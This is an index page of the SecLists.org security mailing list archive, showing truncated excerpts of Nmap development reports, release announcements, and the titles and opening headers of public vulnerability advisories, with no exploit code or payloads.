SecLists.Org Security Mailing List Archive
Any hacker will tell you that the latest news and exploits are not
found on any web site—not even Insecure.Org. No, the cutting edge
in security research is and will continue to be the full
disclosure mailing lists such as Bugtraq. Here we provide web
archives and RSS feeds (now including message extracts), updated in real-time, for many of our favorite lists. Browse the individual lists below.
Nmap Development — Unmoderated technical development forum for debating ideas, patches, and suggestions regarding proposed changes to Nmap and related projects. Subscribe here.
Prabhjyot's Status Report #14 of 17
Prabhjyot Singh Sodhi (Aug 01)
Hey devs,
I'm now inching towards the implementation of my project into nmap.
Achievements:
- Documented the python training code for the multi-stage random forest
model
- Started writing stage 1 prediction code into the c++ engine.
- Made progress on the cmake conversion. I made changes to nmap's Makefile
to enable building of opencv, but am stuck on some absolute urls (in
opencv's build system). Since opencv's build dir...
Re: Zenmap Crashes After Topology View
Daniel Miller (Aug 01)
Francis,
Thanks for the bug report. This is a known issue with Nmap 7.12 which has
been fixed in the 7.25BETA1 release, available from
https://nmap.org/download.html . There is also a workaround available at
http://seclists.org/nmap-dev/2016/q2/178
Dan
Re: Each Probe has a rarity except NULL Probe,but i found "kumo-server" Probe has no rarity also.
Fyodor (Aug 01)
Good catch! It should probably be rarity 8 like the surrounding probes. I
just added this in r36065.
Cheers,
Fyodor
Zenmap Crashes After Topology View
Francis (Aug 01)
Zenmap crashes whenever I go to Topology after a scan. I guess this info:
Version: 7.12
Traceback (most recent call last):
File
"/Applications/Zenmap.app/Contents/Resources/lib/python2.7/site-packages/radialnet/gui/RadialNet.py",
line 878, in expose
self.__draw(context)
File
"/Applications/Zenmap.app/Contents/Resources/lib/python2.7/site-packages/radialnet/gui/RadialNet.py",
line 263, in check_graph_status
return...
Vincent’s Status Report — #14 of 17
Vincent Dumont (Aug 01)
Hello devs,
This week, I am proud to announce that OpenSSL 1.1.0-pre5 and previous versions are now supported by Nmap! Everything
has been merged to the SVN trunk a few hours ago and the CHANGELOG has been updated to reflect that change. I
encountered no issues while testing it for the last time (after submitting it), but I would also be interested to know
if it works for you guys, so feel free to give your feedback!
Accomplishments:...
Tudor's Status Report - #14 of 17
Tudor-Emil COMAN (Aug 01)
Hi,
This week I've had some unsuccessful attempts to improve some areas of ultra_scan:
1. I tried caching the probes that are allocated in doAnyNewProbes() so that only the first hostgroup allocates memory
for probes and the rest would use those objects from the previous.
For scanning big networks like (65536 hosts) on all ports there doesn't seem to be any time gained, there might be some
milliseconds but I don't think...
Abhishek's Status Report - #14 of 17
Abhishek Singh (Aug 01)
Hello Devs,
This week was about testing PRs and writing a few test scripts. My mentor
and I discussed all of the open pull requests and I will be making the
suggested changes soon.
Accomplishments
~ Wrote test scripts for #411
~ Made a few fixes in #459
~ Wrote script dnssec-check-config.nse and needed changes in dns.lua
library; still a lot needs to be done.
~ Fixed #421
Priorities
~ Almost all open PRs, most of them are almost done.
~ dnssec script...
Re: Tudor's Status Report - #13 of 17
Daniel Miller (Jul 31)
Tudor,
This makes a lot of sense. I have a few suggestions, though:
1. We must be absolutely sure that these two checks are doing the same
thing if we are to rely on one to satisfy the other. The obvious fix would
be to have a single function to perform the task, but that might require
some refactoring of data structures and the function signature in order to
carry out. This would be a worthwhile effort to ensure correctness.
2. If the problem...
Re: Tudor's Status Report - #13 of 17
Tudor-Emil COMAN (Jul 31)
Dan,
Well it's like you said, that check is already done for batches of 4096 targets in targets.cc::refresh_hostbatch().
You only need to call target_needs_new_hostgroup in nmap.cc if you are combining targets from different batches.
Let's say you are scanning 5000 hosts, the first 1000 are down, the rest are up. You specified --min-hostgroup 5000.
For a -Pn scan(all hosts are considered up), having the o.ping_group_sz match the...
Re: npcap horror story
食肉大灰兔V5 (Jul 31)
Hi Mike,
I think this is a very rare issue because no one can reproduce it now.
Personally I think the reason is that you installed some incompatible
software. A stock Windows OS won't behave like this. So my suggestion is
that you prepare a stock OS, then install your software one by one, to see
which software causes this issue.
Another way is to provide remote access to me, so I can log on to see
what happens.
Cheers,
Yang
On...
Re: Problems building with ASAN
Daniel Miller (Jul 30)
Jacek,
Would you mind including your nbase/config.log or at least the portions
relating to getaddrinfo? Does the problem persist if you do "make
distclean" before configuring? Nbase's configure script should detect that
you already have getaddrinfo (which necessarily means you have struct
addrinfo).
Dan
Re: Problems building with ASAN
Jacek Wielemborek (Jul 30)
On 30.07.2016 at 06:24, Daniel Miller wrote:
Whoops, you're right, forgot to run "svn up". I did it this time though
and I'm still having issues:
$ make -j1
Compiling libnetutil
cd libnetutil && make
make[1]: Entering directory '/home/d33tah/.nmap/libnetutil'
g++ -c -I../liblinear -I../liblua -I/usr/include/lua
-I../libdnet-stripped/include -I../nbase -I../nsock/include
-DHAVE_CONFIG_H...
Re: Problems building with ASAN
Daniel Miller (Jul 29)
Jacek,
To avoid repeating effort, you should make sure you're working from the
latest SVN (which has an internal version number of 7.25SVN). I just pushed
half a dozen fixes for minor issues found with AddressSanitizer and
UndefinedBehaviorSanitizer in the past few days.
Also, if you're having build issues, be sure to "make distclean" before
re-running configure. It shouldn't be necessary to define any HAVE_*
macros, so...
Re: Problems building with ASAN
Jacek Wielemborek (Jul 29)
On 30.07.2016 at 02:43, Jacek Wielemborek wrote:
I managed to move on a bit with CFLAGS="-fsanitize=address
-DHAVE_GETADDRINFO=1" CXXFLAGS="-fsanitize=address -DHAVE_GETADDRINFO"
LDFLAGS="-fsanitize=address" ./configure
I had a couple other errors that I had to sort out, such as lack of -ldl
when linking Nmap (required by Lua). Also:
$ ./nmap scanme.nmap.org
Starting Nmap 7.12SVN ( https://nmap.org ) at...
Problems building with ASAN
Jacek Wielemborek (Jul 29)
Hello,
Tested under Fedora 23.
g++ -c -I./liblinear -I./liblua -I/usr/include/lua
-I./libdnet-stripped/include -I./nbase -I./nsock/include
-DHAVE_CONFIG_H -DNMAP_NAME=\"Nmap\" -DNMAP_URL=\"https://nmap.org\"
-DNMAP_PLATFORM=\"x86_64-unknown-linux-gnu\"
-DNMAPDATADIR=\"/usr/local/share/nmap\" -D_FORTIFY_SOURCE=2
-fsanitize=address -Wall -fno-strict-aliasing nse_bit.cc -o nse_bit.o
In file included from...
Nmap Announce — Moderated list for the most important new releases and announcements regarding the Nmap Security Scanner and related projects. We recommend that all Nmap users subscribe.
Nmap 7.25BETA1 Released with our new Npcap driver, 6 new NSE scripts, and more!
Fyodor (Jul 19)
Hi folks! As you may know, we've been working for the last 3 years on an
improved Windows packet capturing library named Npcap. It's based on the
original WinPcap (which hasn't been maintained in years), but we rewrote
the driver to use modern APIs (NDIS 6) for better performance. It also
improves security and enables new features. For example, Npcap allows Nmap
to do raw scans (including SYN scans and OS detection) of localhost...
Introducing the 2016 Nmap/Google Summer of Code Team!
Fyodor (May 09)
Hello everyone. Google has agreed to sponsor five amazing students to
spend this summer enhancing the Nmap Security Scanner and I'm proud to
introduce our 2015 team:
*Abhishek Singh* will be working as a Feature Creeper and Bug Hunter,
making improvements throughout the Nmap codebase. The project hasn't even
started yet and he's already found and fixed several NSE script bugs and
has other code changes in the works. Abhishek is...
Nmap 7.10 released: 12 new scripts, hundreds of OS/version fingerprints, bug fixes, and more!
Fyodor (Mar 17)
Hi Folks! Before I tell you about today's new Nmap release, I wanted to
share some Summer of Code news:
Google posted a fantastic story by one of our Summer of Code alumni about
how the program helped take him from rural China to a full-ride scholarship
at the University of Virginia graduate school! His mentor David and I had
the chance to meet him in San Francisco:...
Nmap Project Seeking Talented Programmers for Google Summer of Code 2016
Fyodor (Feb 29)
Hi folks. I'm delighted to report that Nmap has been accepted by Google to
participate in this year's Summer of Code internship program. This
innovative and extraordinarily generous program provides $5,500 stipends to
college and graduate students anywhere in the world who spend the summer
improving Nmap from home! They gain valuable experience, get paid,
strengthen their résumés, and write code for millions of users. We're one...
Nmap 7 Released!
Fyodor (Nov 19)
Hi folks! After 3.5 years of work by more than 100 contributors and 3,200
code commits since Nmap 6, we're delighted to announce Nmap 7! Compared to
Nmap 6, we now have 171 new NSE scripts, mature IPv6 support for everything
from host discovery to port scanning to OS detection, better
infrastructure, significant performance improvements, and a lot more!
For the top 7 improvements in Nmap 7, see the release notes:
https://nmap.org/7
Or...
Nmap 6.49BETA6: 10 new NSE scripts, hundreds of new OS and version detection, GSoC improvements, and more!
Fyodor (Nov 03)
Hi folks! I'm happy to announce the release of Nmap 6.49BETA6 with many
great improvements! This includes a lot of work from our Summer of Code
students as well as our regular crew of developers. The release has 10 new
NSE scripts, hundreds of new IPv4 and IPv6 OS detection signatures, and a
bunch of new version detection sigs bringing our total above 10,000! There
are dozens of other improvements as well.
As usual, Nmap 6.49BETA5...
Nmap GSoC 2015 Success Report
Fyodor (Oct 19)
Nmap hackers:
I'm pleased to report the successful completion of our 11th Google Summer
of Code. And this year all five of our students passed! They added many
great features and improvements which Nmap users are sure to enjoy. Much
of their work has already been integrated in the Nmap 6.49BETA5 release
last month, and we're working to integrate even more in the upcoming stable
version. Let's look at their accomplishments...
Nmap Project News: 6.49BETA5 release, 18th Birthday, Movie Star, Summer of Code success, Shwag, etc
Fyodor (Sep 25)
Hi folks. I know I haven't posted to this Nmap Announcement lists since
June, but we've had a very busy summer and I'm going to try and catch you
up in one go!
First of all, we've had four new releases since then, including today's
release of Nmap 6.49BETA5. They are all stability-focused releases to fix
all the bugs and problems we can find in preparation for a big upcoming
stable release in October (I hope).
As...
Nmap 6.49BETA1 released! New scripts, new signatures, new ASCII art!
Fyodor (Jun 03)
Hi Folks. I'm happy to announce the release of Nmap 6.49BETA1. This
version has hundreds of improvements, including:
* 25 new NSE scripts (total is now 494)
* Integrated all of your latest OS detection and version/service detection
submissions (including IPv6). This allows Nmap to properly identify Linux
3.18, Windows 8.1, OS X 10.10, Android 5, etc. We now have more than 10,000
service detection signatures!
* Infrastructure...
Introducing the 2015 Nmap/Google Summer of Code Team!
Fyodor (May 07)
Hello everyone. Google has agreed to sponsor five amazing students to
spend this summer enhancing the Nmap Security Scanner and I'm proud to
introduce our 2015 team:
*Andrew Farabee* will be working to refactor parts of the Nmap codebase in
ways which enable more functionality while also improving performance and
hopefully easing code maintenance too! His first task involves adding a
SOCKS proxy name resolution feature to enable scanning...
Nmap Project Seeking Talented Programmers for Google Summer of Code
Fyodor (Mar 24)
Hi folks. I'm delighted to report that Nmap has been accepted by Google to
participate in this year's Summer of Code internship program. This
innovative and extraordinarily generous program provides $5,500 stipends to
college and graduate students anywhere in the world who spend the summer
improving Nmap from home! They gain valuable experience, get paid,
strengthen their résumés, and write code for millions of users. We're...
Full Disclosure — A public, vendor-neutral forum for detailed discussion of vulnerabilities and exploitation techniques, as well as tools, papers, news, and events of interest to the community. The relaxed atmosphere of this quirky list provides some comic relief and certain industry gossip. More importantly, fresh vulnerabilities sometimes hit this list many hours or days before they pass through the Bugtraq moderation queue.
Cross-Site Scripting in WangGuard WordPress Plugin
Summer of Pwnage (Aug 02)
------------------------------------------------------------------------
Cross-Site Scripting in WangGuard WordPress Plugin
------------------------------------------------------------------------
Yorick Koster, July 2016
------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in the WangGuard...
Cross-Site Scripting in Uji Countdown WordPress Plugin
Summer of Pwnage (Aug 02)
------------------------------------------------------------------------
Cross-Site Scripting in Uji Countdown WordPress Plugin
------------------------------------------------------------------------
Yorick Koster, July 2016
------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in the Uji Countdown...
WinSaber - Unquoted Service Path Privilege Escalation
Vulnerability Lab (Aug 02)
Document Title:
===============
WinSaber - Unquoted Service Path Privilege Escalation
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1879
Release Date:
=============
2016-07-29
Vulnerability Laboratory ID (VL-ID):
====================================
1879
Common Vulnerability Scoring System:
====================================
4.2
Product & Service Introduction:...
Zoll ePCR v2.6.4 iOS - Multiple Persistent Vulnerabilities
Vulnerability Lab (Aug 02)
Document Title:
===============
Zoll ePCR v2.6.4 iOS - Multiple Persistent Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1882
Release Date:
=============
2016-08-01
Vulnerability Laboratory ID (VL-ID):
====================================
1882
Common Vulnerability Scoring System:
====================================
3.5
Product & Service Introduction:...
Docebo LMS 6.9 - (Moxie) API Calls RST Remote Code Execution Vulnerability
Vulnerability Lab (Aug 02)
Document Title:
===============
Docebo LMS 6.9 - (Moxie) API Calls RST Remote Code Execution Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1888
Video: http://www.vulnerability-lab.com/get_content.php?id=1892
Release Date:
=============
2016-08-02
Vulnerability Laboratory ID (VL-ID):
====================================
1888
Common Vulnerability Scoring System:...
Car CMS v3.00.30 - Search Cross Site Scripting Vulnerability
Vulnerability Lab (Aug 02)
Document Title:
===============
Car CMS v3.00.30 - Search Cross Site Scripting Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1891
Release Date:
=============
2016-08-01
Vulnerability Laboratory ID (VL-ID):
====================================
1891
Common Vulnerability Scoring System:
====================================
3.2
Product & Service Introduction:...
Guppy CMS v5.01.03 - Client Side Cross Site Scripting Web Vulnerability
Vulnerability Lab (Aug 02)
Document Title:
===============
Guppy CMS v5.01.03 - Client Side Cross Site Scripting Web Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1887
Release Date:
=============
2016-07-29
Vulnerability Laboratory ID (VL-ID):
====================================
1887
Common Vulnerability Scoring System:
====================================
3.3
Product & Service Introduction:...
FortiManager (Series) - Multiple Web Vulnerabilities
Vulnerability Lab (Aug 02)
Document Title:
===============
FortiManager (Series) - Multiple Web Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1684
Fortinet PSIRT ID: 1624459
Release Notes 1: http://docs.fortinet.com/uploaded/files/2910/fortimanager-v5.4.0-release-notes.pdf
Release Notes 2: http://docs.fortinet.com/uploaded/files/2963/fortimanager-v5.2.6-release-notes.pdf
Release Notes 3:...
Cross-Site Request Forgery in ALO EasyMail Newsletter WordPress Plugin
Summer of Pwnage (Aug 01)
------------------------------------------------------------------------
Cross-Site Request Forgery in ALO EasyMail Newsletter WordPress Plugin
------------------------------------------------------------------------
Yorick Koster, July 2016
------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160724-0021...
Car CMS v3.00.30 - Search Cross Site Scripting Vulnerability
Vulnerability Lab (Aug 01)
Document Title:
===============
Car CMS v3.00.30 - Search Cross Site Scripting Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1891
Release Date:
=============
2016-08-01
Vulnerability Laboratory ID (VL-ID):
====================================
1891
Common Vulnerability Scoring System:
====================================
3.2
Product & Service Introduction:...
Fortinet FortiManager & FortiAnalyzer - (filename) Persistent Web Vulnerability
Vulnerability Lab (Aug 01)
Document Title:
===============
Fortinet FortiManager & FortiAnalyzer - (filename) Persistent Web Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1687
Fortinet PSIRT ID: 1624561
Release Notes #1: http://docs.fortinet.com/uploaded/files/2796/fortios-5.4.0-release-notes.pdf
Release Notes #2: http://docs.fortinet.com/uploaded/files/2861/fortios-v5.2.6-release-notes.pdf
Release Notes...
Stored Cross-Site Scripting vulnerability in WP Live Chat Support WordPress Plugin
Summer of Pwnage (Aug 01)
------------------------------------------------------------------------
Stored Cross-Site Scripting vulnerability in WP Live Chat Support
WordPress Plugin
------------------------------------------------------------------------
Dennis Kerdijk <dennis.at.securelabs.nl> & Erwin Kievith
<erwin.at.securelabs.nl>, July 2016
------------------------------------------------------------------------
Abstract...
Cross-Site Scripting in Contact Bank WordPress Plugin
Summer of Pwnage (Aug 01)
------------------------------------------------------------------------
Cross-Site Scripting in Contact Bank WordPress Plugin
------------------------------------------------------------------------
Yorick Koster, July 2016
------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in the Contact Bank...
SQL injection vulnerability in Booking Calendar WordPress Plugin
Summer of Pwnage (Aug 01)
------------------------------------------------------------------------
SQL injection vulnerability in Booking Calendar WordPress Plugin
------------------------------------------------------------------------
Edwin Molenaar, July 2016
------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
An SQL injection vulnerability exists in the Booking...
Cross-Site Scripting vulnerability in Booking Calendar WordPress Plugin
Summer of Pwnage (Aug 01)
------------------------------------------------------------------------
Cross-Site Scripting vulnerability in Booking Calendar WordPress Plugin
------------------------------------------------------------------------
Edwin Molenaar, July 2016
------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in...
Bugtraq — The premier general security mailing list. Vulnerabilities are often announced here first, so check frequently!
Cross-Site Scripting in WangGuard WordPress Plugin
Summer of Pwnage (Aug 02)
------------------------------------------------------------------------
Cross-Site Scripting in WangGuard WordPress Plugin
------------------------------------------------------------------------
Yorick Koster, July 2016
------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in the WangGuard...
Cross-Site Scripting in Uji Countdown WordPress Plugin
Summer of Pwnage (Aug 02)
------------------------------------------------------------------------
Cross-Site Scripting in Uji Countdown WordPress Plugin
------------------------------------------------------------------------
Yorick Koster, July 2016
------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in the Uji Countdown...
WinSaber - Unquoted Service Path Privilege Escalation
Vulnerability Lab (Aug 02)
Document Title:
===============
WinSaber - Unquoted Service Path Privilege Escalation
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1879
Release Date:
=============
2016-07-29
Vulnerability Laboratory ID (VL-ID):
====================================
1879
Common Vulnerability Scoring System:
====================================
4.2
Product & Service Introduction:...
Docebo LMS 6.9 - (Moxie) API Calls RST Remote Code Execution Vulnerability
Vulnerability Lab (Aug 02)
Document Title:
===============
Docebo LMS 6.9 - (Moxie) API Calls RST Remote Code Execution Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1888
Video: http://www.vulnerability-lab.com/get_content.php?id=1892
Release Date:
=============
2016-08-02
Vulnerability Laboratory ID (VL-ID):
====================================
1888
Common Vulnerability Scoring System:...
Zoll ePCR v2.6.4 iOS - Multiple Persistent Vulnerabilities
Vulnerability Lab (Aug 02)
Document Title:
===============
Zoll ePCR v2.6.4 iOS - Multiple Persistent Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1882
Release Date:
=============
2016-08-01
Vulnerability Laboratory ID (VL-ID):
====================================
1882
Common Vulnerability Scoring System:
====================================
3.5
Product & Service Introduction:...
Car CMS v3.00.30 - Search Cross Site Scripting Vulnerability
Vulnerability Lab (Aug 02)
Document Title:
===============
Car CMS v3.00.30 - Search Cross Site Scripting Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1891
Release Date:
=============
2016-08-01
Vulnerability Laboratory ID (VL-ID):
====================================
1891
Common Vulnerability Scoring System:
====================================
3.2
Product & Service Introduction:...
Guppy CMS v5.01.03 - Client Side Cross Site Scripting Web Vulnerability
Vulnerability Lab (Aug 02)
Document Title:
===============
Guppy CMS v5.01.03 - Client Side Cross Site Scripting Web Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1887
Release Date:
=============
2016-07-29
Vulnerability Laboratory ID (VL-ID):
====================================
1887
Common Vulnerability Scoring System:
====================================
3.3
Product & Service Introduction:...
FortiManager (Series) - Multiple Web Vulnerabilities
Vulnerability Lab (Aug 02)
Document Title:
===============
FortiManager (Series) - Multiple Web Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1684
Fortinet PSIRT ID: 1624459
Release Notes 1: http://docs.fortinet.com/uploaded/files/2910/fortimanager-v5.4.0-release-notes.pdf
Release Notes 2: http://docs.fortinet.com/uploaded/files/2963/fortimanager-v5.2.6-release-notes.pdf
Release Notes 3:...
[security bulletin] HPSBGN03564 rev.2 - HPE Release Control using Java Deserialization, Remote Code Execution
security-alert (Aug 01)
Note: the current version of the following document is available here:
https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c05063986
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c05063986
Version: 2
HPSBGN03564 rev.2 - HPE Release Control using Java Deserialization, Remote
Code Execution
NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.
Release Date: 2016-03-29...
[security bulletin] HPSBUX03632 SSRT110194 rev.1 - HP-UX Mail Server running Sendmail, Local Unauthorized Disclosure of Information
security-alert (Aug 01)
Note: the current version of the following document is available here:
https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c05216368
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c05216368
Version: 1
HPSBUX03632 SSRT110194 rev.1 - HP-UX Mail Server running Sendmail, Local
Unauthorized Disclosure of Information
NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible....
[CVE-2016-6480] Double-Fetch Vulnerability in Linux-4.5/drivers/scsi/aacraid/commctrl.c
wpengfeinudt (Aug 01)
I found this double-fetch vulnerability when I was doing my research on double-fetch issue analysis, and I'd like to
make an announcement here.
This was found in Linux kernel file Linux-4.5/drivers/scsi/aacraid/commctrl.c, and crafted user space data change under
race condition will lead to over-boundary access in kernel structure or local buffer, and serious consequence might be
caused.
==============================================
1....
Cross-Site Request Forgery in ALO EasyMail Newsletter WordPress Plugin
Summer of Pwnage (Aug 01)
------------------------------------------------------------------------
Cross-Site Request Forgery in ALO EasyMail Newsletter WordPress Plugin
------------------------------------------------------------------------
Yorick Koster, July 2016
------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160724-0021...
Kaspersky Safe Browser iOS Application - MITM SSL Certificate Vulnerability (CVE-2016-6231)
David Coomber (Aug 01)
Kaspersky Safe Browser iOS Application - MITM SSL Certificate
Vulnerability (CVE-2016-6231)
Car CMS v3.00.30 - Search Cross Site Scripting Vulnerability
Vulnerability Lab (Aug 01)
Document Title:
===============
Car CMS v3.00.30 - Search Cross Site Scripting Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1891
Release Date:
=============
2016-08-01
Vulnerability Laboratory ID (VL-ID):
====================================
1891
Common Vulnerability Scoring System:
====================================
3.2
Product & Service Introduction:...
Fortinet FortiManager & FortiAnalyzer - (filename) Persistent Web Vulnerability
Vulnerability Lab (Aug 01)
Document Title:
===============
Fortinet FortiManager & FortiAnalyzer - (filename) Persistent Web Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1687
Fortinet PSIRT ID: 1624561
Release Notes #1: http://docs.fortinet.com/uploaded/files/2796/fortios-5.4.0-release-notes.pdf
Release Notes #2: http://docs.fortinet.com/uploaded/files/2861/fortios-v5.2.6-release-notes.pdf
Release Notes...
Security Basics — A high-volume list which permits people to ask "stupid questions" without being derided as "n00bs". I recommend this list to network security newbies, but be sure to read Bugtraq and other lists as well.
"The Blind SQL Injection Issue" explanation
Mihamina RAKOTOMANDIMBY (May 31)
Hi members,
A web application of mine has been scanned by a "security tool".
It reports some issues about "Blind SQL Injection Issue"
The test result seems to indicate a vulnerability
because it shows that values can be appended to parameter
values, indicating that they were embedded in an SQL
query. In this test, three (or sometimes four)
requests are sent. The last is logically equal to the original,
and the next-to-last...
Penetration Testing — While this list is intended for "professionals", participants frequently disclose techniques and strategies that would be useful to anyone with a practical interest in security and network auditing.
[ERPSCAN-16-021] SAP xMII - Reflected XSS vulnerability
ERPScan inc (Jul 14)
Application: SAP xMII
Versions Affected: SAP xMII 15
Vendor URL: http://SAP.com
Bugs: XSS
Sent: 04.12.2015
Reported: 05.12.2015
Vendor response: 05.12.2015
Date of Public Advisory: 12.04.2016
Reference: SAP Security Note 2201295
Author: Nursultan Abubakirov (ERPScan) , Vahagn Vardanyan (ERPScan)
Description
1. ADVISORY INFORMATION
Title: SAP xMII – Reflected XSS vulnerability
Advisory ID: [ERPSCAN-16-021]
Risk: medium
Advisory...
[ERPSCAN-16-020] SAP NetWeaver AS JAVA UDDI component - XXE vulnerability
ERPScan inc (Jul 14)
Application: SAP NetWeaver AS JAVA
Versions Affected: SAP NetWeaver AS JAVA 7.4
Vendor URL: http://SAP.com
Bug: XXE
Sent: 04.12.2015
Reported: 05.12.2015
Vendor response: 05.12.2015
Date of Public Advisory: 12.04.2016
Reference: SAP Security Note 2254389
Author: Vahagn Vardanyan (ERPScan)
Description
1. ADVISORY INFORMATION
Title: SAP NetWeaver AS JAVA UDDI component – XXE vulnerability
Advisory ID: [ERPSCAN-16-020]
Risk:...
[ERPSCAN-16-019] SAP NetWeaver Enqueue Server - DoS vulnerability
ERPScan inc (Jul 14)
Application: SAP NetWeaver Enqueue Server
Versions Affected: SAP NetWeaver Enqueue Server 7.4
Vendor URL: http://SAP.com
Bug: denial of service
Sent: 04.12.2015
Reported: 05.12.2015
Vendor response: 05.12.2015
Date of Public Advisory: 12.04.2016
Reference: SAP Security Note 2258784
Author: Vahagn Vardanyan (ERPScan)
Description
1. ADVISORY INFORMATION
Title: SAP NetWeaver Enqueue Server – DoS vulnerability
Advisory ID:...
[ERPSCAN-16-012] SAP NetWeaver AS JAVA - directory traversal vulnerability
ERPScan inc (Jun 17)
Application: SAP NetWeaver AS JAVA
Versions Affected: SAP NetWeaver AS JAVA 7.1 - 7.5
Vendor URL: http://SAP.com
Bug: Directory traversal
Sent: 29.09.2015
Reported: 29.09.2015
Vendor response: 30.09.2015
Date of Public Advisory: 08.03.2016
Reference: SAP Security Note 2234971
Author: Vahagn Vardanyan (ERPScan)
Description
1. ADVISORY INFORMATION
Title: [ERPSCAN-16-012] SAP NetWeaver AS Java directory traversal vulnerability...
[ERPSCAN-16-013] SAP NetWeaver AS Java ctcprotocol servlet - XXE vulnerability
ERPScan inc (Jun 17)
Application: SAP NetWeaver AS JAVA
Versions Affected: SAP NetWeaver AS JAVA 7.1 - 7.5
Vendor URL: http://SAP.com
Bug: XXE
Sent: 20.10.2015
Reported: 21.10.2015
Vendor response: 21.10.2015
Date of Public Advisory: 08.03.2016
Reference: SAP Security Note 2235994
Author: Vahagn Vardanyan (ERPScan)
Description
1. ADVISORY INFORMATION
Title: [ERPSCAN-16-013] SAP NetWeaver AS Java ctcprotocol servlet –
XXE vulnerability
Advisory...
[ERPSCAN-16-014] SAP NetWeaver AS Java NavigationURLTester - XSS vulnerability
ERPScan inc (Jun 17)
Application: SAP NetWeaver AS JAVA
Versions Affected: SAP NetWeaver AS JAVA 7.1 - 7.5
Vendor URL: http://SAP.com
Bug: XSS
Sent: 20.10.2015
Reported: 21.10.2015
Vendor response: 21.10.2015
Date of Public Advisory: 08.03.2016
Reference: SAP Security Note 2238375
Author: Vahagn Vardanyan (ERPScan)
Description
1. ADVISORY INFORMATION
Title: [ERPSCAN-16-014] SAP NetWeaver AS Java NavigationURLTester –
XSS vulnerability
Advisory...
Firewall Wizards — Tips and tricks for firewall administrators
Re: Interesting infographic on the history of firewalls
Darden, Patrick (Aug 04)
I did something similar to this in 1994-5 at Harvard using a version of rot-13 and icmp. Seriously. And it worked.
:-)
--p
-----Original Message-----
From: firewall-wizards-bounces () listserv cybertrust com [mailto:firewall-wizards-bounces () listserv cybertrust com]
On Behalf Of Marcus J. Ranum
Sent: Saturday, July 26, 2014 11:39 AM
To: Firewall Wizards Security Mailing List
Subject: [EXTERNAL]Re: [fw-wiz] Interesting infographic on the...
Re: Interesting infographic on the history of firewalls
Marcus J. Ranum (Aug 01)
Claudio Telmon wrote:
When I was at TIS, in 199?2, I set up Onions' tunnel driver and a couple
shell scripts that uuencoded the packets coming out of the tunnel, and
emailed them to another system user with a .forward file that uudecoded
the packets and injected them into a peer tunnel. With that setup, and its
opposite on both machines, I was able to NFS mount filesystems across
a secure mail guard. (Hint: if you're doing your own...
Re: Interesting infographic on the history of firewalls
Marcus J. Ranum (Aug 01)
It hasn't happened, yet.
mjr.
Web App Security — Provides insights on the unique challenges which make web applications notoriously hard to secure, as well as attack methods including SQL injection, cross-site scripting (XSS), cross-site request forgery, and more.
Faraday v1.0.21 with our new GTK interface!
Francisco Amato (Jun 21)
Faraday is the Integrated Multiuser Risk Environment you were looking
for! It maps and leverages all the knowledge you generate in real
time, letting you track and understand your audits. Our dashboard for
CISOs and managers uncovers the impact and risk being assessed by the
audit in real-time without the need for a single email. Developed with
a specialized set of functionalities that help users improve their own
work, the main purpose is to...
Faraday v1.0.20 is here! New conflict resolution, hosts and services views & bug fixes!
Francisco Amato (May 27)
A brand new Faraday version is ready! Faraday v1.0.20 is here,
bringing more functionality to our GTK interface and other cool new
features.
If you've been keeping up with Faraday, on our last release
http://blog.infobytesec.com/2016/04/prepare-warm-welcome-for-faraday-v1019.html
we published a new experimental GTK interface. In this iteration we
added several missing features and fixed a lot of small bugs.
You will probably notice the...
44CON CFP Now Open
Steve (May 17)
44CON is the UK's premier annual technical security conference and training event. From the evening of the 14th of
September till the 16th of September 2016, expect a top-tier international technical conference with fast wifi, loose
0day, catering, a bar and of course, Gin O'Clock.
_____ ______ _____________________ __ |
__ // /_ // /_ ____/_ __ \__ | / / | "London calling to the
_ // /_ // /_ / _ / / /_ |/ / |...
Give a warm welcome to Faraday v1.0.19! New GTK interface, Custom Reports & Bug fixing
Francisco Amato (May 05)
Faraday v1.0.19 is ready! More documentation, a new interface and
plugin fixes are some of the improvements included in this version.
Continuing with our efforts to make Faraday accessible to everyone we
stopped the development and spent a few days improving our
documentation, so feel free to take a look at it and let us know if
you feel something is missing!
It shouldn't come as a surprise that our QT interface will be
deprecated during...
Mobile Security Framework (MobSF) v0.9.2 Released
Ajin Abraham (May 03)
Hey Folks,
Happy to release MobSF v0.9.2
About MobSF
